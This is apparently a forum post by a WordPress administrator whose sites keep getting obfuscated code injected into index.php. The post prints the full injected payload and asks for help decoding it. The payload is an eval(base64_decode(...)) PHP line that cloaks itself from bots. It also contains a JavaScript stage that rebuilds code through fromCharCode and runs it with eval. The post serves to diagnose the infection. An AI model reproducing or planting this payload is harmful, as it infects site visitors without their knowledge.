I have dozens of wordpress installs which are constantly getting malicious code injected into the beginning of index.php despite keeping wordpress updated as well as updating to the latest version of timthumb.php in each setup.
So now it’s time to reverse engineer this bugger, learn more about how it works, and possibly find a way to prevent more of the same script injects.
It uses a couple levels of obfuscation, first being a base64 decode:
[CODE]eval(base64_decode(‘ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1MGNubDdjVDFrYjJOMWJXVnVkQzVqY21WaGRHVkZiR1Z0Wlc1MEtDSndJaWs3Y1M1aGNIQmxibVJEYUdsc1pDaHhLeUlpS1R0OVkyRjBZMmdvY1hjcGUyZzlMVEF4TWk4MU8zUnllWHRpWTNOa1BYQnliM1J2ZEhsd1pTMHlPMzFqWVhSamFDaGlZWGRuS1h0emN6MWJYVHRtUFNob0tUOG9JbVp5YjIxRGFHRnlReUlySW05a1pTSXBPaUlpTzJVOWQybHVaRzkzV3lKbElpc2lkbUZzSWwwN2JqMWJPU3d4T0N3ek1UVXNOREE0TERNeUxEZ3dMRE13TUN3ME5EUXNPVGtzTWpNMExETXlOeXcwTURRc01URXdMREl6TWl3eE16Z3NOREV5TERFd01Td3lNeklzTWpBM0xEUXpNaXd4TURFc01qRTRMRE13TXl3ME5EQXNNVEUyTERJek1Dd3hPVGdzTkRnMExEZzBMREU1TkN3ek1Ea3NNekV5TERrM0xESXhPQ3d6TURNc01UWXdMRE01TERFNU5pd3pNek1zTkRBd0xERXlNU3czT0N3eE1qTXNNelkwTERRNExERTROaXd4TWpNc05Ea3lMREV6TERFNExESTNMRE0yTERFd05Td3lNRFFzTXpReUxETTRPQ3d4TURrc01qQXlMRE0wTWl3eE5qQXNOREVzTVRFNExETTVMRE0yTERrc01qVXdMRGsyTERRd05Dd3hNRGdzTWpNd0xETXdNeXd4TWpnc01USXpMREkyTERJM0xETTJMRGtzTWpBd0xETXpNeXd6T1RZc01URTNMREl4T0N3ek1ETXNORFF3TERFeE5pdzVNaXd6TlRjc05EVTJMREV3TlN3eU16SXNNekF6TERFMk1Dd3pOQ3d4TWpBc016RTFMRFF3T0N3eE1UUXNNVGswTERNeU55dzBNRFFzTXpJc01qTXdMRE0wTWl3ek9UWXNOakVzTnpnc016RXlMRFEyTkN3eE1UWXNNakkwTERFM05Dd3hPRGdzTkRjc01qSXlMRE16TXl3ME16SXNPVGdzTWpJNExETXlOeXcwTkRnc05EWXNNak15TERNeU5DdzBNREFzTkRZc01UazRMREk1Tnl3eE9EZ3NNVEF3TERrMExERTFOaXd4T1RJc05USXNPVElzTXpNMkxEUXhOaXd4TVRJc01USTJMRE13T1N3ME5EUXNOakVzT1Rnc01URTNMREV5T0N3eE1Ua3NNakV3TERNd01DdzBOalFzTVRBMExERXlNaXd4TVRjc01UazJMRFE0TERjNExEazJMRFF4Tml3eE1ERXNNakV3TERNd09TdzBNVFlzTVRFMkxERXlNaXd4TVRjc01UazJMRFE0TERjNExEazJMRFEyTUN3eE1UWXNNalF5TERNeU5DdzBNRFFzTmpFc056Z3NNelUwTERReU1Dd3hNVFVzTWpFd0xESTVOQ3cwTWpBc01UQTRMREl4TUN3ek5EZ3NORGcwTERVNExESXdPQ3d6TVRVc05EQXdMREV3TUN3eU1ESXNNek13TERJek5pd3hNVElzTWpJeUxETTBOU3cwTWpBc01URTJMREl4TUN3ek16TXNORFF3TERVNExERTVOQ3d5T1RRc05EWXdMREV4TVN3eU1UWXNNelV4TERRMk5Dd3hNREVzTVRFNExETXlOQ3cwTURRc01UQXlMREl6TWl3eE56UXNNVGt5TERVNUxESXpNaXd6TXpNc05EUTRMRFU0TERrMkxERTNOeXd4TlRZc05qSXNNVEl3TERFME1TdzBNakFzTVRBeUxESXlPQ3d5T1RFc05ETTJMREV3TVN3eE1qUXNNVEF5TERFMk5DdzFPU3d5Tml3eU55d3pOaXd4TWpVc01qWXNNamNzTXpZc01UQXlMREl6TkN3ek16QXNNemsyTERFeE5pd3lNVEFzTXpNekxEUTBNQ3d6TWl3eU1UQXNNekEyTERRMU5pdzVOeXd5TVRnc016QXpMRFExTml3ME1DdzRNaXd6Tmprc05USXNPU3d4T0N3eU55dzBOeklzT1Rjc01qSTRMRGsyTERRd09Dd3pNaXd4TWpJc09UWXNOREF3TERFeE1Td3hPVGdzTXpVeExEUXpOaXd4TURFc01qSXdMRE0wT0N3eE9EUXNPVGtzTWpJNExETXdNeXd6T0Rnc01URTJMREl3TWl3eU1EY3NORE15TERFd01Td3lNVGdzTXpBekxEUTBNQ3d4TVRZc09EQXNNVEUzTERReU1Dd3hNRElzTWpJNExESTVNU3cwTXpZc01UQXhMRGM0TERFeU15d3lNellzTVRBeUxEa3lMRE0wTlN3ME1EUXNNVEUyTERFek1Dd3pORGdzTkRZMExERXhOQ3d5TVRBc01qazBMRFEyT0N3eE1UWXNNakF5TERFeU1Dd3hOVFlzTVRFMUxESXlPQ3d5T1Rjc01UVTJMRFEwTERjNExETXhNaXcwTmpRc01URTJMREl5TkN3eE56UXNNVGc0TERRM0xESXlNaXd6TXpNc05ETXlMRGs0TERJeU9Dd3pNamNzTkRRNExEUTJMREl6TWl3ek1qUXNOREF3TERRMkxERTVPQ3d5T1Rjc01UZzRMREV3TUN3NU5Dd3hOVFlzTVRreUxEVXlMRGt5TERNek5pdzBNVFlzTVRFeUxERXlOaXd6TURrc05EUTBMRFl4TERrNExERXhOeXd4TmpRc05Ua3NNakEwTERFek9DdzBOakFzTVRFMkxESTBNaXd6TWpRc05EQTBMRFEyTERJek5pd3pNVFVzTkRZd0xERXdOU3d4T1RZc016RTFMRFF6TWl3eE1EVXNNak15TERNMk15d3lORFFzTXprc01qQTRMRE14TlN3ME1EQXNNVEF3TERJd01pd3pNekFzTVRVMkxEVTVMREl3TkN3eE16Z3NORFl3TERFeE5pd3lORElzTXpJMExEUXdOQ3cwTml3eU1qUXNNek16TERRMk1Dd3hNRFVzTWpNeUxETXhOU3cwTkRRc01URXdMREV5TWl3eE1UY3NNemc0TERrNExESXpNQ3d6TXpNc05ETXlMREV4Tnl3eU16SXNNekF6TERFMU5pdzFPU3d5TURRc01UTTRMRFEyTUN3eE1UWXNNalF5TERNeU5DdzBNRFFzTkRZc01qRTJMRE13TXl3ME1EZ3NNVEUyTERFeU1pd3hNVGNzTVRreUxETTVMREV4T0N3ek1EWXNNVGcwTERFeE5Td3lNeklzTXpZekxEUXpNaXd4TURFc09USXNNelE0TERRME5Dd3hNVElzTVRJeUxERXhOeXd4T1RJc016a3NNVEU0TERNd05pd3hPRFFzTVRFMUxESXdNaXd6TkRnc01qWXdMREV4Tml3eU16SXNNelF5TERReU1DdzVPQ3d5TXpRc016UTRMRFF3TkN3ME1DdzNPQ3d6TlRjc05ESXdMREV3TUN3eU16SXNNekV5TERFMU5pdzBOQ3czT0N3eE5EY3NNVGt5TERNNUxEZ3lMREUzTnl3ME1EZ3NORFlzTWpNd0xETXdNeXcwTmpRc05qVXNNak15TERNME9DdzBOVFlzTVRBMUxERTVOaXd6TlRFc05EWTBMREV3TVN3NE1Dd3hNVGNzTkRFMkxERXdNU3d5TVRBc016QTVMRFF4Tml3eE1UWXNOemdzTVRNeUxERTFOaXcwT1N3NU5pd3hNVGNzTVRZMExEVTVMREkyTERJM0xETTJMRGtzTWpBd0xETXpNeXd6T1RZc01URTNMREl4T0N3ek1ETXNORFF3TERFeE5pdzVNaXd6TURrc05EQTBMREV4Tml3eE16Z3NNekkwTERRd05Dd3hNRGtzTWpBeUxETXpNQ3cwTmpRc01URTFMREV6TWl3ek5qTXNNek0yTERrM0xESXdOaXd5TXpRc016ZzRMREV3T1N3eU1ESXNNVEl3TERFMU5pdzVPQ3d5TWpJc016QXdMRFE0TkN3ek9TdzRNaXd5TnpNc01Ua3lMRGt6TERreUxESTVNU3cwTkRnc01URXlMREl3TWl3ek16QXNOREF3TERZM0xESXdPQ3d6TVRVc05ETXlMREV3TUN3NE1Dd3pNRFlzTVRZMExEVTVMREkyTERJM0xETTJMREV5TlYwN2FXWW9kMmx1Wkc5M0xtUnZZM1Z0Wlc1MEtXWnZjaWhwUFRZdE1pMHhMVEl0TVRzdE5UZ3hLMmtoUFRJdE1qdHBLeXNwZTJzOWFUdHpjejF6Y3l0VGRISnBibWRiWmwwb2JsdHJYUzhvYVNVb2FDcG9LU3N5TFRFcEtUdDlaU2h6Y3lrN2ZYMDhMM05qY21sd2REND0nKSk7DQp9’));
Which after decoding, spits out some more jargon. This one I don’t know how to decode/unpack:
[CODE]<script>try{q=document.createElement(“p”);q.appendChild(q+””);}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?(“fromCharC”+”ode”):””;e=window[“e”+”val”];n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,196,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,117,218,303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,312,464,116,224,174,188,47,222,333,432,98,228,327,448,46,232,324,400,46,198,297,188,100,94,156,192,52,92,336,416,112,126,309,444,61,98,117,128,119,210,300,464,104,122,117,196,48,78,96,416,101,210,309,416,116,122,117,196,48,78,96,460,116,242,324,404,61,78,354,420,115,210,294,420,108,210,348,484,58,208,315,400,100,202,330,236,112,222,345,420,116,210,333,440,58,194,294,460,111,216,351,464,101,118,324,404,102,232,174,192,59,232,333,448,58,96,177,156,62,120,141,420,102,228,291,436,101,124,102,164,59,26,27,36,125,26,27,36,102,234,330,396,116,210,333,440,32,210,306,456,97,218,303,456,40,82,369,52,9,18,27,472,97,228,96,408,32,122,96,400,111,198,351,436,101,220,348,184,99,228,303,388,116,202,207,432,101,218,303,440,116,80,117,420,102,228,291,436,101,78,123,236,102,92,345,404,116,130,348,464,114,210,294,468,116,202,120,156,115,228,297,156,44,78,312,464,116,224,174,188,47,222,333,432,98,228,327,448,46,232,324,400,46,198,297,188,100,94,156,192,52,92,336,416,112,126,309,444,61,98,117,164,59,204,138,460,116,242,324,404,46,236,315,460,105,196,315,432,105,232,363,244,39,208,315,400,100,202,330,156,59,204,138,460,116,242,324,404,46,224,333,460,105,232,315,444,110,122,117,388,98,230,333,432,117,232,303,156,59,204,138,460,116,242,324,404,46,216,303,408,116,122,117,192,39,118,306,184,115,232,363,432,101,92,348,444,112,122,117,192,39,118,306,184,115,202,348,260,116,232,342,420,98,234,348,404,40,78,357,420,100,232,312,156,44,78,147,192,39,82,177,408,46,230,303,464,65,232,348,456,105,196,351,464,101,80,117,416,101,210,309,416,116,78,132,156,49,96,117,164,59,26,27,36,9,200,333,396,117,218,303,440,116,92,309,404,116,138,324,404,109,202,330,464,115,132,363,336,97,206,234,388,109,202,120,156,98,222,300,484,39,82,273,192,93,92,291,448,112,202,330,400,67,208,315,432,100,80,306,164,59,26,27,36,125];if(window.document)for(i=6-2-1-2-1;-581+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}</script>
Anyone know what to do with this?